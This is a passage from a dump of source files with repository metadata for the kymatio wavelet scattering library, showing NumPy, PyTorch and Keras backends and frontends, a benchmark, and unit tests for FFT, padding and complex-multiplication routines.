= psi[n2]['j']\n theta2 = psi[n2]['theta']\n\n if j2 <= j1:\n continue\n\n U_2_c = cdgmm(U_1_c, psi[n2][j1])\n U_2_c = subsample_fourier(U_2_c, k=2 ** (j2 - j1))\n U_2_c = fft(U_2_c, 'C2C', inverse=True)\n U_2_c = modulus(U_2_c)\n U_2_c = fft(U_2_c, 'C2C')\n\n # Third low pass filter\n S_2_c = cdgmm(U_2_c, phi[j2])\n S_2_c = subsample_fourier(S_2_c, k=2 ** (J - j2))\n\n S_2_r = fft(S_2_c, 'C2R', inverse=True)\n S_2_r = unpad(S_2_r)\n\n out_S_2.append({'coef': S_2_r,\n 'j': (j1, j2),\n 'theta': (theta1, theta2)})\n\n out_S = []\n out_S.extend(out_S_0)\n out_S.extend(out_S_1)\n out_S.extend(out_S_2)\n\n if out_type == 'array':\n out_S = concatenate([x['coef'] for x in out_S])\n\n return out_S\n\n\n__all__ = ['scattering2d']\n"
},
{
"alpha_fraction": 0.6293706297874451,
"alphanum_fraction": 0.6419580578804016,
"avg_line_length": 41.05882263183594,
"blob_id": "a8d305a6d8f1449c51c0be316557791d15fff0a6",
"content_id": "3de81350ac1a52b06fcd9519bc8320b367ac9faf",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1430,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 34,
"path": "/kymatio/scattering1d/frontend/keras_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from ...frontend.keras_frontend import ScatteringKeras\nfrom ...scattering1d.frontend.base_frontend import ScatteringBase1D\n\nfrom kymatio.tensorflow import Scattering1D as ScatteringTensorFlow1D\n\nfrom tensorflow.python.framework import tensor_shape\n\n\nclass ScatteringKeras1D(ScatteringKeras, ScatteringBase1D):\n def __init__(self, J, Q=1, max_order=2, oversampling=0):\n ScatteringKeras.__init__(self)\n ScatteringBase1D.__init__(self, J, None, Q, max_order, True,\n oversampling, True, 'array', None)\n\n def build(self, input_shape):\n shape = tuple(tensor_shape.TensorShape(input_shape).as_list()[-1:])\n self.S = ScatteringTensorFlow1D(J=self.J, shape=shape,\n Q=self.Q, max_order=self.max_order,\n oversampling=self.oversampling)\n ScatteringKeras.build(self, input_shape)\n\n def compute_output_shape(self, input_shape):\n input_shape = tensor_shape.TensorShape(input_shape).as_list()\n nc = self.S.output_size()\n k0 = max(self.J - self.oversampling, 0)\n ln = self.S.ind_end[k0] - self.S.ind_start[k0]\n output_shape = [input_shape[0], nc, ln]\n return tensor_shape.TensorShape(output_shape)\n\n def get_config(self):\n keys = [\"J\", \"Q\", \"max_order\", \"oversampling\"]\n return {key: getattr(self, key) for key in keys}\n\nScatteringKeras1D._document()\n"
},
{
"alpha_fraction": 0.7139175534248352,
"alphanum_fraction": 0.75,
"avg_line_length": 31.33333396911621,
"blob_id": "fcb117d8c2447b83f1e32530968937c0fca8efe9",
"content_id": "7d8e8d8ce24fbf7adb5d652446936e46a1f1a4d7",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 12,
"path": "/kymatio/keras.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .scattering1d.frontend.keras_frontend \\\n import ScatteringKeras1D as Scattering1D\nfrom .scattering2d.frontend.keras_frontend \\\n import ScatteringKeras2D as Scattering2D\n\nScattering1D.__module__ = 'kymatio.keras'\nScattering1D.__name__ = 'Scattering1D'\n\nScattering2D.__module__ = 'kymatio.keras'\nScattering2D.__name__ = 'Scattering2D'\n\n__all__ = ['Scattering1D', 'Scattering2D']\n"
},
{
"alpha_fraction": 0.5569466352462769,
"alphanum_fraction": 0.5672057271003723,
"avg_line_length": 29.268421173095703,
"blob_id": "e3a7dd299031d91740cd8942b230aec55cf6804c",
"content_id": "33738a96971e9569d4197163c423a376928ca018",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5751,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 190,
"path": "/kymatio/scattering3d/backend/numpy_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom collections import namedtuple\nfrom scipy.fftpack import fftn, ifftn\n\n\nBACKEND_NAME = 'numpy'\n\n\ndef _iscomplex(x):\n return x.dtype == np.complex64 or x.dtype == np.complex128\n\n\ndef complex_modulus(input_array):\n \"\"\"Computes complex modulus.\n\n Parameters\n ----------\n input_array : tensor\n Input tensor whose complex modulus is to be calculated.\n Returns\n -------\n modulus : tensor\n Tensor the same size as input_array. modulus[..., 0] holds the\n result of the complex modulus, modulus[..., 1] = 0.\n\n \"\"\"\n\n return np.abs(input_array)\n\n\ndef modulus_rotation(x, module=None):\n \"\"\"Used for computing rotation invariant scattering transform coefficents.\n\n Parameters\n ----------\n x : tensor\n Size (batchsize, M, N, O, 2).\n module : tensor\n Tensor that holds the overall sum. If none, initializes the tensor\n to zero (default).\n Returns\n -------\n output : torch tensor\n Tensor of the same size as input_array. It holds the output of\n the operation::\n $\\\\sqrt{\\\\sum_m (\\\\text{input}_\\\\text{array} \\\\star \\\\psi_{j,l,m})^2)}$\n which is covariant to 3D translations and rotations.\n \"\"\"\n if module is None:\n module = np.zeros_like(x)\n else:\n module = module ** 2\n module += np.abs(x) ** 2\n return np.sqrt(module)\n\n\ndef compute_integrals(input_array, integral_powers):\n \"\"\"Computes integrals.\n\n Computes integrals of the input_array to the given powers.\n Parameters\n ----------\n input_array : torch tensor\n Size (B, M, N, O), where B is batch_size, and M, N, O are spatial\n dims.\n integral_powers : list\n List of P positive floats containing the p values used to\n compute the integrals of the input_array to the power p (l_p\n norms).\n Returns\n -------\n integrals : torch tensor\n Tensor of size (B, P) containing the integrals of the input_array\n to the powers p (l_p norms).\n \"\"\"\n integrals = np.zeros((input_array.shape[0], len(integral_powers)),\n dtype=np.complex64)\n for i_q, q in enumerate(integral_powers):\n integrals[:, i_q] = (input_array ** q).reshape((input_array.shape[0], -1)).sum(axis=1)\n return integrals\n\n\ndef fft(x, direction='C2C', inverse=False):\n \"\"\"\n Interface with torch FFT routines for 2D signals.\n\n Example\n -------\n x = torch.randn(128, 32, 32, 2)\n x_fft = fft(x, inverse=True)\n\n Parameters\n ----------\n input : tensor\n complex input for the FFT\n direction : string\n 'C2R' for complex to real, 'C2C' for complex to complex\n inverse : bool\n True for computing the inverse FFT.\n NB : if direction is equal to 'C2R', then an error is raised.\n\n \"\"\"\n if direction == 'C2R':\n if not inverse:\n raise RuntimeError('C2R mode can only be done with an inverse FFT.')\n\n if direction == 'C2R':\n output = np.real(ifftn(x, axes=(-3, -2, -1)))\n elif direction == 'C2C':\n if inverse:\n output = ifftn(x, axes=(-3, -2, -1))\n else:\n output = fftn(x, axes=(-3, -2, -1))\n\n return output\n\n\ndef cdgmm3d(A, B, inplace=False):\n \"\"\"Complex pointwise multiplication.\n\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n\n Parameters\n ----------\n A : torch tensor\n Complex torch tensor.\n B : torch tensor\n Complex of the same size as A.\n inplace : boolean, optional\n If set True, all the operations are performed inplace.\n\n Raises\n ------\n RuntimeError\n In the event that the tensors are not compatibile for multiplication\n (i.e. the final four dimensions of A do not match with the dimensions\n of B), or in the event that B is not complex, or in the event that the\n type of A and B are not the same.\n TypeError\n In the event that x is not complex i.e. does not have a final dimension\n of 2, or in the event that both tensors are not on the same device.\n\n Returns\n -------\n output : torch tensor\n Torch tensor of the same size as A containing the result of the\n elementwise complex multiplication of A with B.\n \"\"\"\n\n if A.shape[-3:] != B.shape[-3:]:\n raise RuntimeError('The tensors are not compatible for multiplication.')\n\n if not _iscomplex(A) or not _iscomplex(B):\n raise TypeError('The input, filter and output should be complex.')\n\n if B.ndim != 3:\n raise RuntimeError('The second tensor must be simply a complex array.')\n\n if type(A) is not type(B):\n raise RuntimeError('A and B should be same type.')\n\n\n if inplace:\n return np.multiply(A, B, out=A)\n else:\n return A * B\n\n\ndef concatenate(arrays, L):\n S = np.stack(arrays, axis=1)\n S = S.reshape((S.shape[0], S.shape[1] // (L + 1), (L + 1)) + S.shape[2:])\n return S\n\n\nbackend = namedtuple('backend',\n ['name',\n 'cdgmm3d',\n 'fft',\n 'modulus',\n 'modulus_rotation',\n 'compute_integrals',\n 'concatenate'])\n\nbackend.name = 'numpy'\nbackend.cdgmm3d = cdgmm3d\nbackend.fft = fft\nbackend.concatenate = concatenate\nbackend.modulus = complex_modulus\nbackend.modulus_rotation = modulus_rotation\nbackend.compute_integrals = compute_integrals\n"
},
{
"alpha_fraction": 0.5912519097328186,
"alphanum_fraction": 0.5912519097328186,
"avg_line_length": 20.387096405029297,
"blob_id": "bd3005c1cef22c61d8fd4b1d8aba327365a5e2d9",
"content_id": "f5f796fead947ae0bdfb534c9683ea952e65656f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 663,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 31,
"path": "/kymatio/frontend/numpy_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from ..backend.numpy_backend import input_checks\n\nclass ScatteringNumPy:\n def __init__(self):\n self.frontend_name = 'numpy'\n\n def scattering(self, x):\n \"\"\" This function should compute the scattering transform.\"\"\"\n raise NotImplementedError\n\n def __call__(self, x):\n \"\"\"This method is an alias for `scattering`.\"\"\"\n\n input_checks(x)\n\n return self.scattering(x)\n\n _doc_array = 'np.ndarray'\n _doc_array_n = 'n'\n\n _doc_alias_name = '__call__'\n\n _doc_alias_call = ''\n\n _doc_frontend_paragraph = ''\n\n _doc_sample = 'np.random.randn({shape})'\n\n _doc_has_shape = True\n\n _doc_has_out_type = True\n"
},
{
"alpha_fraction": 0.752293586730957,
"alphanum_fraction": 0.7844036817550659,
"avg_line_length": 37.47058868408203,
"blob_id": "df8bb36d58ac7dced9c4e6805eb5e532b4e6635d",
"content_id": "393861b691ff3cedcdd52197ca022fe53ff79321",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 654,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 17,
"path": "/kymatio/sklearn.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .scattering1d.frontend.sklearn_frontend \\\n import ScatteringTransformer1D as Scattering1D\nfrom .scattering2d.frontend.sklearn_frontend \\\n import ScatteringTransformer2D as Scattering2D\nfrom .scattering3d.frontend.sklearn_frontend \\\n import HarmonicScatteringTransformer3D as HarmonicScattering3D\n\nScattering1D.__module__ = 'kymatio.sklearn'\nScattering1D.__name__ = 'Scattering1D'\n\nScattering2D.__module__ = 'kymatio.sklearn'\nScattering2D.__name__ = 'Scattering2D'\n\nHarmonicScattering3D.__module__ = 'kymatio.sklearn'\nHarmonicScattering3D.__name__ = 'HarmonicScattering3D'\n\n__all__ = ['Scattering1D', 'Scattering2D', 'HarmonicScattering3D']\n"
},
{
"alpha_fraction": 0.41283783316612244,
"alphanum_fraction": 0.46148648858070374,
"avg_line_length": 28.600000381469727,
"blob_id": "17053f3e7738874e87dd26385701acb1c0154019",
"content_id": "ee9a1c68ce6688f20a5d4057fdd5ec2f17e15123",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1480,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 50,
"path": "/benchmarks/benchmarks/scattering3d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\nimport kymatio.scattering3d.backend as backend\nfrom kymatio import HarmonicScattering3D\n\nclass BenchmarkHarmonicScattering3D:\n params = [\n [\n { # Small. 32x32x32, 2 scales, 2 harmonics\n \"J\": 2,\n \"shape\": (32, 32, 32),\n \"L\": 2,\n },\n { # Large. 128x128x128, 2 scales, 2 harmonics\n \"J\": 2,\n \"shape\": (128, 128, 128),\n \"L\": 2,\n },\n { # A case with many scales (J=6) and few harmonics (L=1)\n \"J\": 6,\n \"shape\": (128, 128, 128),\n \"L\": 1,\n },\n { # A case with few scales (J=2) and many harmonics (L=6)\n \"J\": 2,\n \"shape\": (32, 32, 32),\n \"L\": 4,\n }\n ],\n [\n 1,\n ]\n ]\n param_names = [\"sc_params\", \"batch_size\"]\n\n def setup(self, sc_params, batch_size):\n scattering = HarmonicScattering3D(**sc_params)\n scattering.cpu()\n x = torch.randn(\n batch_size,\n sc_params[\"shape\"][0], sc_params[\"shape\"][1], sc_params[\"shape\"][2],\n dtype=torch.float32)\n x.cpu()\n self.scattering = scattering\n self.x = x\n\n def time_constructor(self, sc_params, batch_size):\n HarmonicScattering3D(**sc_params)\n\n def time_forward(self, sc_params, batch_size):\n (self.scattering).forward(self.x)\n"
},
{
"alpha_fraction": 0.5305123329162598,
"alphanum_fraction": 0.5409342050552368,
"avg_line_length": 31.37398338317871,
"blob_id": "0a9eebf766e5bcabccbb49a60edce94e548d4dea",
"content_id": "b4a709706feec11674bb061683cc74c37c866867",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7964,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 246,
"path": "/kymatio/scattering3d/backend/torch_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\nimport warnings\n\nBACKEND_NAME = 'torch'\nfrom collections import namedtuple\nfrom packaging import version\n\n\ndef _is_complex(input):\n \"\"\"Checks if input is complex.\n\n Parameters\n ----------\n input : tensor\n Input to be checked if complex.\n Returns\n -------\n output : boolean\n Returns True if complex (i.e. final dimension is 2), False\n otherwise.\n \"\"\"\n return input.shape[-1] == 2\n\n\ndef complex_modulus(input_array):\n \"\"\"Computes complex modulus.\n\n Parameters\n ----------\n input_array : tensor\n Input tensor whose complex modulus is to be calculated.\n Returns\n -------\n modulus : tensor\n Tensor the same size as input_array. modulus[..., 0] holds the\n result of the complex modulus, modulus[..., 1] = 0.\n\n \"\"\"\n modulus = torch.zeros_like(input_array)\n modulus[..., 0] = torch.sqrt((input_array ** 2).sum(-1))\n return modulus\n\n\ndef modulus_rotation(x, module=None):\n \"\"\"Used for computing rotation invariant scattering transform coefficents.\n\n Parameters\n ----------\n x : tensor\n Size (batchsize, M, N, O, 2).\n module : tensor\n Tensor that holds the overall sum. If none, initializes the tensor\n to zero (default).\n Returns\n -------\n output : torch tensor\n Tensor of the same size as input_array. It holds the output of\n the operation::\n $\\\\sqrt{\\\\sum_m (\\\\text{input}_\\\\text{array} \\\\star \\\\psi_{j,l,m})^2)}$\n which is covariant to 3D translations and rotations.\n \"\"\"\n if module is None:\n module = torch.zeros_like(x)\n else:\n module = module ** 2\n module[..., 0] += (x ** 2).sum(-1)\n return torch.sqrt(module)\n\n\ndef compute_integrals(input_array, integral_powers):\n \"\"\"Computes integrals.\n\n Computes integrals of the input_array to the given powers.\n Parameters\n ----------\n input_array : torch tensor\n Size (B, M, N, O), where B is batch_size, and M, N, O are spatial\n dims.\n integral_powers : list\n List of P positive floats containing the p values used to\n compute the integrals of the input_array to the power p (l_p\n norms).\n Returns\n -------\n integrals : torch tensor\n Tensor of size (B, P) containing the integrals of the input_array\n to the powers p (l_p norms).\n \"\"\"\n integrals = torch.zeros((input_array.shape[0], len(integral_powers)),\n device=input_array.device)\n for i_q, q in enumerate(integral_powers):\n integrals[:, i_q] = (input_array ** q).view(\n input_array.shape[0], -1).sum(1)\n return integrals\n\nif version.parse(torch.__version__) >= version.parse('1.8'):\n def fft(input, inverse=False):\n \"\"\"Interface with torch FFT routines for 3D signals.\n fft of a 3d signal\n Example\n -------\n x = torch.randn(128, 32, 32, 32, 2)\n\n x_fft = fft(x)\n x_ifft = fft(x, inverse=True)\n Parameters\n ----------\n x : tensor\n Complex input for the FFT.\n inverse : bool\n True for computing the inverse FFT.\n\n Raises\n ------\n TypeError\n In the event that x does not have a final dimension 2 i.e. not\n complex.\n\n Returns\n -------\n output : tensor\n Result of FFT or IFFT.\n \"\"\"\n if not _is_complex(input):\n raise TypeError('The input should be complex (e.g. last dimension is 2)')\n if inverse:\n return torch.view_as_real(torch.fft.ifftn(torch.view_as_complex(input), dim=[-1, -2, -3]))\n return torch.view_as_real(torch.fft.fftn(torch.view_as_complex(input), dim=[-1, -2, -3]))\nelse:\n def fft(input, inverse=False):\n \"\"\"Interface with torch FFT routines for 3D signals.\n fft of a 3d signal\n Example\n -------\n x = torch.randn(128, 32, 32, 32, 2)\n x_fft = fft(x)\n x_ifft = fft(x, inverse=True)\n Parameters\n ----------\n x : tensor\n Complex input for the FFT.\n inverse : bool\n True for computing the inverse FFT.\n Raises\n ------\n TypeError\n In the event that x does not have a final dimension 2 i.e. not\n complex.\n Returns\n -------\n output : tensor\n Result of FFT or IFFT.\n \"\"\"\n if not _is_complex(input):\n raise TypeError('The input should be complex (e.g. last dimension is 2)')\n if inverse:\n return torch.ifft(input, 3)\n return torch.fft(input, 3)\n\ndef cdgmm3d(A, B, inplace=False):\n \"\"\"Complex pointwise multiplication.\n\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n\n Parameters\n ----------\n A : torch tensor\n Complex torch tensor.\n B : torch tensor\n Complex of the same size as A.\n inplace : boolean, optional\n If set True, all the operations are performed inplace.\n\n Raises\n ------\n RuntimeError\n In the event that the tensors are not compatibile for multiplication\n (i.e. the final four dimensions of A do not match with the dimensions\n of B), or in the event that B is not complex, or in the event that the\n type of A and B are not the same.\n TypeError\n In the event that x is not complex i.e. does not have a final dimension\n of 2, or in the event that both tensors are not on the same device.\n\n Returns\n -------\n output : torch tensor\n Torch tensor of the same size as A containing the result of the\n elementwise complex multiplication of A with B.\n \"\"\"\n if not A.is_contiguous():\n warnings.warn(\"cdgmm3d: tensor A is converted to a contiguous array.\")\n A = A.contiguous()\n if not B.is_contiguous():\n warnings.warn(\"cdgmm3d: tensor B is converted to a contiguous array.\")\n B = B.contiguous()\n\n if A.shape[-4:] != B.shape:\n raise RuntimeError('The tensors are not compatible for multiplication.')\n\n if not _is_complex(A) or not _is_complex(B):\n raise TypeError('The input, filter and output should be complex.')\n\n if B.ndimension() != 4:\n raise RuntimeError('The second tensor must be simply a complex array.')\n\n if type(A) is not type(B):\n raise RuntimeError('A and B should be same type.')\n\n if A.device.type != B.device.type:\n raise TypeError('A and B must be both on GPU or both on CPU.')\n\n if A.device.type == 'cuda':\n if A.device.index != B.device.index:\n raise TypeError('A and B must be on the same GPU.')\n\n C = A.new(A.shape)\n\n C[..., 0] = A[..., 0] * B[..., 0] - A[..., 1] * B[..., 1]\n C[..., 1] = A[..., 0] * B[..., 1] + A[..., 1] * B[..., 0]\n\n return C if not inplace else A.copy_(C)\n\n\ndef concatenate(arrays, L):\n S = torch.stack(arrays, dim=1)\n S = S.reshape((S.shape[0], S.shape[1] // (L + 1), (L + 1)) + S.shape[2:])\n return S\n\n\nbackend = namedtuple('backend',\n ['name',\n 'cdgmm3d',\n 'fft',\n 'modulus',\n 'modulus_rotation',\n 'compute_integrals',\n 'concatenate'])\n\nbackend.name = 'torch'\nbackend.cdgmm3d = cdgmm3d\nbackend.fft = fft\nbackend.concatenate = concatenate\nbackend.modulus = complex_modulus\nbackend.modulus_rotation = modulus_rotation\nbackend.compute_integrals = compute_integrals\n"
},
{
"alpha_fraction": 0.5152092576026917,
"alphanum_fraction": 0.5436686873435974,
"avg_line_length": 31.58333396911621,
"blob_id": "b3221c9d4baf52a37e2215305aa5679619ffa271",
"content_id": "d1c73b19cbf44e170d7d1feeb00dbd9014f16de6",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18377,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 564,
"path": "/tests/scattering2d/test_torch_scattering2d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "\"\"\" This script will test the submodules used by the scattering module\"\"\"\n\nimport os\nimport io\nimport numpy as np\nimport torch\nimport pytest\nfrom kymatio import Scattering2D\nfrom torch.autograd import gradcheck\nfrom collections import namedtuple\n\ndevices = ['cpu']\nif torch.cuda.is_available():\n devices.append('cuda')\n\n\nbackends = []\nbackends_devices = []\n\nskcuda_available = False\ntry:\n if torch.cuda.is_available():\n from skcuda import cublas\n import cupy\n skcuda_available = True\nexcept:\n Warning('torch_skcuda backend not available.')\n\n\nif skcuda_available:\n from kymatio.scattering2d.backend.torch_skcuda_backend import backend\n backends.append(backend)\n if 'cuda' in devices:\n backends_devices.append((backend, 'cuda'))\n\n\nfrom kymatio.scattering2d.backend.torch_backend import backend\nbackends.append(backend)\n\nbackends_devices.append((backend, 'cpu'))\nif 'cuda' in devices:\n backends_devices.append((backend, 'cuda'))\n\n\nclass TestPad:\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_Pad(self, backend_device):\n backend, device = backend_device\n\n pad = backend.Pad((2, 2, 2, 2), (4, 4))\n\n x = torch.randn(1, 4, 4)\n x = x.to(device)\n\n z = pad(x)\n\n assert z.shape == (1, 8, 8, 2)\n assert torch.allclose(z[0, 2, 2, 0], x[0, 0, 0])\n assert torch.allclose(z[0, 1, 0, 0], x[0, 1, 2])\n assert torch.allclose(z[0, 1, 1, 0], x[0, 1, 1])\n assert torch.allclose(z[0, 1, 2, 0], x[0, 1, 0])\n assert torch.allclose(z[0, 1, 3, 0], x[0, 1, 1])\n assert torch.allclose(z[..., 1], torch.zeros_like(z[..., 1]))\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_unpad(self, backend_device):\n backend, device = backend_device\n\n x = torch.randn(4, 4)\n x = x.to(device)\n\n y = backend.unpad(x)\n\n assert y.shape == (2, 2)\n assert torch.allclose(y[0, 0], x[1, 1])\n assert torch.allclose(y[0, 1], x[1, 2])\n\n\n# Checked the modulus\nclass TestModulus:\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_Modulus(self, backend_device):\n backend, device = backend_device\n\n modulus = backend.modulus\n x = torch.rand(100, 10, 4, 2).to(device)\n\n y = modulus(x)\n u = torch.squeeze(torch.sqrt(torch.sum(x * x, 3)))\n v = y.narrow(3, 0, 1)\n u = u.squeeze()\n v = v.squeeze()\n assert torch.allclose(u, v)\n\n y = x[..., 0].contiguous()\n with pytest.raises(TypeError) as record:\n modulus(y)\n assert 'should be complex' in record.value.args[0]\n\n y = x[::2, ::2]\n with pytest.raises(RuntimeError) as record:\n modulus(y)\n assert 'contiguous' in record.value.args[0]\n\n @pytest.mark.parametrize('backend', backends)\n def test_cuda_only(self, backend):\n modulus = backend.modulus\n if backend.name.endswith('_skcuda'):\n x = torch.rand(100, 10, 4, 2).cpu()\n with pytest.raises(TypeError) as exc:\n y = modulus(x)\n assert 'Use the torch backend' in exc.value.args[0]\n\n\n# Checked the subsampling\nclass TestSubsampleFourier:\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_SubsampleFourier(self, backend_device):\n backend, device = backend_device\n subsample_fourier = backend.subsample_fourier\n\n x = torch.rand(100, 1, 128, 128, 2).to(device)\n\n y = torch.zeros(100, 1, 8, 8, 2).to(device)\n\n for i in range(8):\n for j in range(8):\n for m in range(16):\n for n in range(16):\n y[...,i,j,:] += x[...,i+m*8,j+n*8,:]\n\n y = y / (16*16)\n\n z = subsample_fourier(x, k=16)\n assert torch.allclose(y, z)\n\n y = x[..., 0]\n with pytest.raises(TypeError) as record:\n subsample_fourier(y, k=16)\n assert 'should be complex' in record.value.args[0]\n\n y = x[::2, ::2]\n with pytest.raises(RuntimeError) as record:\n subsample_fourier(y, k=16)\n assert 'should be contiguous' in record.value.args[0]\n\n @pytest.mark.parametrize('backend', backends)\n def test_gpu_only(self, backend):\n subsample_fourier = backend.subsample_fourier\n\n if backend.name.endswith('_skcuda'):\n x = torch.rand(100, 1, 128, 128, 2).cpu()\n with pytest.raises(TypeError) as exc:\n z = subsample_fourier(x, k=16)\n assert 'Use the torch backend' in exc.value.args[0]\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_batch_shape_agnostic(self, backend_device):\n backend, device = backend_device\n subsample_fourier = backend.subsample_fourier\n\n x = torch.rand(100, 1, 8, 128, 128, 2).to(device)\n\n y = torch.zeros(100, 1, 8, 8, 8, 2).to(device)\n\n for i in range(8):\n for j in range(8):\n for m in range(16):\n for n in range(16):\n y[...,i,j,:] += x[...,i+m*8,j+n*8,:]\n\n y = y / (16*16)\n\n z = subsample_fourier(x, k=16)\n assert torch.allclose(y, z)\n\n\n# Check the CUBLAS routines\nclass TestCDGMM:\n @pytest.fixture(params=(False, True))\n def data(self, request):\n real_filter = request.param\n\n x = torch.rand(100, 128, 128, 2).float()\n filt = torch.rand(128, 128, 2).float()\n y = torch.ones(100, 128, 128, 2).float()\n\n if real_filter:\n filt[..., 1] = 0\n\n y[..., 0] = x[..., 0] * filt[..., 0] - x[..., 1] * filt[..., 1]\n y[..., 1] = x[..., 1] * filt[..., 0] + x[..., 0] * filt[..., 1]\n\n if real_filter:\n filt = filt[..., :1].contiguous()\n\n return x, filt, y\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n @pytest.mark.parametrize('inplace', (False, True))\n def test_cdgmm_forward(self, data, backend_device, inplace):\n backend, device = backend_device\n\n x, filt, y = data\n x, filt, y = x.to(device), filt.to(device), y.to(device)\n\n z = backend.cdgmm(x, filt, inplace=inplace)\n\n Warning('Tolerance has been slightly lowered here...')\n # There is a very small meaningless difference for skcuda+GPU\n assert torch.allclose(y, z, atol=1e-7, rtol =1e-6)\n\n @pytest.mark.parametrize('backend', backends)\n def test_gpu_only(self, data, backend):\n x, filt, y = data\n if backend.name.endswith('_skcuda'):\n x = x.cpu()\n filt = filt.cpu()\n\n with pytest.raises(TypeError) as exc:\n z = backend.cdgmm(x, filt)\n assert 'must be CUDA' in exc.value.args[0]\n\n @pytest.mark.parametrize('backend', backends)\n def test_cdgmm_exceptions(self, backend):\n with pytest.raises(RuntimeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2), torch.empty(4, 3, 2))\n assert 'not compatible' in exc.value.args[0]\n\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 1), torch.empty(4, 5, 1))\n assert 'input should be complex' in exc.value.args[0]\n\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2), torch.empty(4, 5, 3))\n assert 'should be complex' in exc.value.args[0]\n\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2),\n torch.empty(4, 5, 1).double())\n assert 'must be of the same dtype' in exc.value.args[0]\n\n if 'cuda' in devices:\n if backend.name.endswith('_skcuda'):\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2),\n torch.empty(4, 5, 1).cuda())\n assert 'must be cuda tensors' in exc.value.args[0].lower()\n elif not backend.name.endswith('_skcuda'):\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2),\n torch.empty(4, 5, 1).cuda())\n assert 'input must be on gpu' in exc.value.args[0].lower()\n\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(torch.empty(3, 4, 5, 2).cuda(),\n torch.empty(4, 5, 1))\n assert 'input must be on cpu' in exc.value.args[0].lower()\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_contiguity_exception(self, backend_device):\n backend, device = backend_device\n\n x = torch.empty(3, 4, 5, 3).to(device)[..., :2]\n y = torch.empty(4, 5, 3).to(device)[..., :2]\n\n with pytest.raises(RuntimeError) as exc:\n backend.cdgmm(x.contiguous(), y)\n assert 'be contiguous' in exc.value.args[0]\n\n with pytest.raises(RuntimeError) as exc:\n backend.cdgmm(x, y.contiguous())\n assert 'be contiguous' in exc.value.args[0]\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_device_mismatch(self, backend_device):\n backend, device = backend_device\n\n if device == 'cpu':\n return\n\n if torch.cuda.device_count() < 2:\n return\n\n x = torch.empty(3, 4, 5, 2).to('cuda:0')\n y = torch.empty(4, 5, 1).to('cuda:1')\n\n with pytest.raises(TypeError) as exc:\n backend.cdgmm(x, y)\n assert 'must be on the same GPU' in exc.value.args[0]\n\n\nclass TestFFT:\n @pytest.mark.parametrize('backend', backends)\n def test_fft(self, backend):\n x = torch.randn(2, 2, 2)\n\n y = torch.empty_like(x)\n y[0, 0, :] = x[0, 0, :] + x[0, 1, :] + x[1, 0, :] + x[1, 1, :]\n y[0, 1, :] = x[0, 0, :] - x[0, 1, :] + x[1, 0, :] - x[1, 1, :]\n y[1, 0, :] = x[0, 0, :] + x[0, 1, :] - x[1, 0, :] - x[1, 1, :]\n y[1, 1, :] = x[0, 0, :] - x[0, 1, :] - x[1, 0, :] + x[1, 1, :]\n\n z = backend.fft(x, direction='C2C')\n\n assert torch.allclose(y, z)\n\n z = backend.fft(x, direction='C2C', inverse=True)\n\n z = z * 4.0\n\n assert torch.allclose(y, z)\n\n z = backend.fft(x, direction='C2R', inverse=True)\n\n z = z * 4.0\n\n assert z.shape == x.shape[:-1]\n assert torch.allclose(y[..., 0], z)\n\n @pytest.mark.parametrize('backend_device', backends_devices)\n def test_fft_exceptions(self, backend_device):\n backend, device = backend_device\n\n with pytest.raises(RuntimeError) as record:\n backend.fft(torch.empty(2, 2), direction='C2R',\n inverse=False)\n assert 'done with an inverse' in record.value.args[0]\n\n x = torch.rand(4, 4, 1)\n x = x.to(device)\n with pytest.raises(TypeError) as record:\n backend.fft(x)\n assert 'complex' in 